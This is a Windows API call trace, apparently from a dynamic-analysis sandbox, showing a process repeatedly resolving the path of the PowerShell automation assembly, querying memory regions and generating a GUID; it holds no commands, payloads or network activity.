	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
	[0161.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.857] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.858] GetLastError () returned 0x0
	[0161.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.859] GetLastError () returned 0x0
	[0161.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.859] GetLastError () returned 0x0
	[0161.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.859] GetLastError () returned 0x0
	[0161.859] VirtualQuery (in: lpAddress=0x14d064, lpBuffer=0x14e064, dwLength=0x1c | out: lpBuffer=0x14e064*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.859] GetLastError () returned 0x0
	[0161.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.859] GetLastError () returned 0x0
	[0161.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.860] GetLastError () returned 0x0
	[0161.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.860] GetLastError () returned 0x0
	[0161.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.860] GetLastError () returned 0x0
	[0161.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.860] GetLastError () returned 0x0
	[0161.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.860] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.861] GetLastError () returned 0x0
	[0161.863] VirtualQuery (in: lpAddress=0x14d064, lpBuffer=0x14e064, dwLength=0x1c | out: lpBuffer=0x14e064*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.863] GetLastError () returned 0x0
	[0161.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.863] GetLastError () returned 0x0
	[0161.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.863] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.864] GetLastError () returned 0x0
	[0161.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.865] GetLastError () returned 0x0
	[0161.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.865] GetLastError () returned 0x0
	[0161.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.865] GetLastError () returned 0x0
	[0161.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.865] GetLastError () returned 0x0
	[0161.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.865] GetLastError () returned 0x0
	[0161.865] VirtualQuery (in: lpAddress=0x14d064, lpBuffer=0x14e064, dwLength=0x1c | out: lpBuffer=0x14e064*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.866] GetLastError () returned 0x0
	[0161.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.866] GetLastError () returned 0x0
	[0161.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.866] GetLastError () returned 0x0
	[0161.866] VirtualQuery (in: lpAddress=0x14d064, lpBuffer=0x14e064, dwLength=0x1c | out: lpBuffer=0x14e064*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.867] GetLastError () returned 0x0
	[0161.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.867] GetLastError () returned 0x0
	[0161.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.868] GetLastError () returned 0x0
	[0161.868] VirtualQuery (in: lpAddress=0x14cc94, lpBuffer=0x14dc94, dwLength=0x1c | out: lpBuffer=0x14dc94*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.868] VirtualQuery (in: lpAddress=0x14ccd0, lpBuffer=0x14dcd0, dwLength=0x1c | out: lpBuffer=0x14dcd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.868] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.869] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.869] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.870] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.871] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.871] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.871] VirtualQuery (in: lpAddress=0x14ce3c, lpBuffer=0x14de3c, dwLength=0x1c | out: lpBuffer=0x14de3c*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.871] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.872] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.872] VirtualQuery (in: lpAddress=0x14cf98, lpBuffer=0x14df98, dwLength=0x1c | out: lpBuffer=0x14df98*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.872] VirtualQuery (in: lpAddress=0x14cfd4, lpBuffer=0x14dfd4, dwLength=0x1c | out: lpBuffer=0x14dfd4*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.873] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb2ecbbee, Data2=0x7d38, Data3=0x41f4, Data4=([0]=0x9d, [1]=0x9, [2]=0x9d, [3]=0xb, [4]=0xcc, [5]=0x2b, [6]=0x13, [7]=0x56))) returned 0x0
